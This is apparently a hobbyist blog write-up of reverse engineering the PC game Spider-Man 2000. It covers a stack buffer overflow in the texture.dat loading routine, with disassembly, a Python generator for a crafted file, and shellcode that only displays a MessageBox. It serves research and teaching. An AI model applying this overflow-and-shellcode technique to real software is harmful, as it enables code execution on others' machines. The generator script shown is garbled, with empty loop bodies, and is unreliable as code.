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Exploiting: Spiderman 2000 - Buffer overflow in file loading routine


At the end of this year(2019) I decided to completly reverse engineer the game Spider-Man 2000 for the PC in order to be able to fix all of its problems and possibly port it to more architectures and OS(es). During my second stream I was working on the routine that loads the file texture.dat and noticed that the buffer not only in allocated in the stack but there's no boundary check.

texture.dat is a file that exists in the game's directory and apparents to be useless since the lack of it doesn't cause any harm to the game or experience.

The vulnerability

sub_5163E0 calls sub_516250 to load texture.dat and passes a local variable as a buffer.

int __cdecl sub_5163E0(char *a1)
	int v2; // [esp+0h] [ebp-224h]
	int Buffer; // [esp+4h] [ebp-220h]
	char v4; // [esp+8h] [ebp-21Ch]
	char v5; // [esp+Bh] [ebp-219h]
	int v6; // [esp+24h] [ebp-200h]

	if ( a1 )
		*a1 = 0;
	if ( !sub_516250(&Buffer, aTextureDat) )
		return 2;

As can be seen below, this buffer only has 0x220 bytes.

.text:005163E0 Buffer          = dword ptr -220h
.text:005163E0 var_21C         = byte ptr -21Ch
.text:005163E0 var_219         = byte ptr -219h
.text:005163E0 var_200         = dword ptr -200h
.text:005163E0 arg_0           = dword ptr  4
.text:005163E0                 sub     esp, 220h
.text:005163E6                 push    esi
.text:005163E7                 mov     esi, [esp+224h+arg_0]
.text:005163EE                 test    esi, esi
.text:005163F0                 jz      short loc_5163F5
.text:005163F2                 mov     byte ptr [esi], 0
.text:005163F5 loc_5163F5:                             ; CODE XREF: sub_5163E0+10?j
.text:005163F5                 lea     eax, [esp+224h+Buffer]
.text:005163F9                 push    offset aTextureDat ; "texture.dat"
.text:005163FE                 push    eax             ; lpBuffer
.text:005163FF                 call    sub_516250
.text:00516404                 add     esp, 8
.text:00516407                 test    eax, eax
.text:00516409                 jnz     short loc_516415
.text:0051640B                 mov     al, 2
.text:0051640D                 pop     esi
.text:0051640E                 add     esp, 220h
.text:00516414                 retn

Here's the relevant part of the loading:

LPVOID __cdecl sub_516250(LPVOID lpBuffer, char *a2)
	v9 = CreateFileA(Filename, 0x80000000, 1u, 0, 3u, 0, 0);
	v10 = v9;
	if ( v9 == (HANDLE)-1 )
		return 0;
	v11 = GetFileSize(v9, 0);
	v12 = v11;
	//The only check it does is wether the number doesn't have the last 2 bits set and if it's bigger than 4
	if ( v11 < 4 || v11 & 3 )
		return 0;
	ReadFile(v10, lpBuffer, v11, &NumberOfBytesRead, 0);
	if ( NumberOfBytesRead < v12 )
		return 0;
	*(_DWORD *)lpBuffer = v12 >> 2;

	//Returns an array of size 0x190 that contains the decryption key
	v13 = sub_4FC230();

	v14 = v12 - 4;
	v15 = 0;

	//Decrypts texture.dat
	if ( v14 )
			*((_BYTE *)lpBuffer + v15 + 4) ^= v13[v15 % 0x190];
		while ( v15 < v14 );
	return lpBuffer;

Having a texture.dat of size 0x224 is enough to trigger the vulnerability.


NOTE: All the code for the generator is available in my spidey-tools repository.

Out of the 0x224 bytes the first 4 are dedicated to the file size and last 4 to the jump address. So that results in 0x21C for the shellcode which is more than enough for a simple PoC.

texture.dat generator

The script creates a list that latter is converted to a bytearray and then dumped to disk.

The way the list is generated is as follows:

Finally it is encrypted(XOR is symmetric) and then dumped to disk.


byt = open("xor_key.bin", "rb").read()
final = "\x00\x00\x00\x00\x6A\x00\x6A\x00\x68".encode()
final = [e for e in final]
final = [e for e in final]

pwn_str = "Game has been pwnd\x00".encode()
for e in pwn_str:

while len(final) != 0x220:


final = bytearray(bytes(final))
for index,_ in enumerate(final[4:]):
    final[4+index] ^= byt[index%0x190]

with open("texture.dat", "wb") as f:

The string with the hex characters - \x00 - must respect the utf-8 encoding. That caused lots of problems, that the string \xB8 would be converted to \xC2\xB8, that is why I split the logic.


Since this exploit has a lack usefulness I decided to keep it simple and just spawn a MessageBox. Here's the full shellcode:

6A 00        | push 0                     |
6A 00        | push 0                     |
68 26FC1900  | push 19FC26                | 19FC26:"Game has been pwnd"
6A 00        | push 0                     |
B8 C8595100  | mov eax,spideypc.5159C8    |
FFE0         | jmp eax                    |

The address spideypc.5159C8 contains a call to MessageBoxA followed by a _exit(1) which was perfect for this case.


result of buffer overflow

Video of process

If you're interested in seeing how this process unfolded then you can watch the two VODs.

Here I stumbled upon the problem but don't go super deep:

Stream dedicated to developing the exploit: